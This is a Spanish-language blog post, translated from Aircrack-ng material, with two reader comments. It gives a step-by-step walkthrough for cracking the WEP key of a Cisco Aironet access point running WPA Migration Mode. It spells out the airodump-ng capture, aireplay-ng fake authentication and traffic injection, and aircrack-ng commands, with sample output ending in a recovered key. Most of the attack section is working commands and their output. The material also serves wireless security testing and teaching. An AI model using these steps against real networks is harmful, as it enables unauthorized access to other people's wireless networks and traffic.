jueves, 20 de enero de 2011

WPA Modo Migración



WPA Migration Mode, es un modo de configuración soportado por los puntos de acceso Cisco Aironet para las IOS 12.2(11)JA y superiores.


Esta habilita ambos cifrados, WPA y WEP para ser asociados al AP usando el mismo identificador, (ESSID).


Para ello se asume que disponemos de lo siguiente antes de proceder:
Usamos drivers propiamente parcheados para la inyeccion.
Estamos cerca del punto de acceso
Estamos usando la versión 1.2 de Aircrack o superior.




Escenario:

  • MAC address del host atacante: 00:1f:3c:4e:88:46
  • BSSID : 00:26:0B:2A:BA:40
  • ESSID : migrate
  • Canal: 8
  • Interfaz: wlan0

    Empezamos:


    1. Creamos la interfaz monitor en el canal del AP
    2. Lanzamos airodump-ng filtrando por el canal y BSSID del AP, también filtramos para obtener solo IV´s
    3. Lanzamos Aireplay-ng para realizar autenticaciones falsas contra el AP
    4. Lanzamos Aireplay-ng en "WPA Migration Mode" para inyectar tráfico.
    5. Lanzamos Aircrack-ng para obtener la clave.


    airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0


     
     
    Ahora realizamos una autenticación fallida al punto de acceso.
    Para ello debe de haber al menos una mac address asociada al punto
    para que no ignore el AP nuestro tráfico. 
     
    aireplay-ng -1 0 -e migrate –a 00:26:0B:2A:BA:40
    -h 00:1f:3c:4e:88:46 mon0
     
    12:27:40 Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8
    12:27:40 Sending Authentication Request (Open System) [ACK]
    12:27:40 Authentication successful 12:27:40 Sending Association Request [ACK]
    12:27:40 Association successful :-) (AID: 1)

    Si obtenemos paquetes de desautenticación, lo intentamos de nuevo hasta que funcione, sin que esto tenga éxito no podemos seguir adelante.
    Vamos a lanzar aireplay-ng en "Migration Mode"

    aireplay-ng -8 -b 00:26:0B:2A:BA:40  -h 00:1f:3c:4e:88:46 mon0

    12:17:52  Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40)
    on channel 8
    Saving ARP requests in replay_arp-0811-121752.cap
    You should also start airodump-ng to capture replies.
    Remember to filter the capture to only keep WEP frames:
    "tshark -R 'wlan.wep.iv' -r capture.cap -w outcapture.cap"
    Read 318368 packets (102102 ARPs, 78 ACKs),
    sent 59315 packets..(500 pps)
     
     
    Podemos confirmar que estamos inyectando correctamente ya que
    los datas suben rápidamente.


    Finalmente Lanzamos Aircrack-ng para obtener la clave. 
     
    aircrack-ng -a 1 -b 00:26:0B:2A:BA:40 output*.cap

    Aircrack-ng 1.2
    [00:00:00] Tested 763 keys (got 47981 IVs)

    KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ]
    Decrypted correctly: 100%


    Traducción e interpretación: Propia.
    Fuente: Aircrack-ng

    2 comentarios:

    1. oie compadre donde o como puedo actualizar mi aircrack a las vercion 1.2 por que yo tengo la 1.1 en ubuntu 10.10 me seria de mucha ayuda gracias

      ResponderEliminar
    2. Es una nueva implementacion para la nueva version, aun no ha salido oficialmente aunque como ves, ya han desvelado alguna que otra cosa.

      Un saludo.

      ResponderEliminar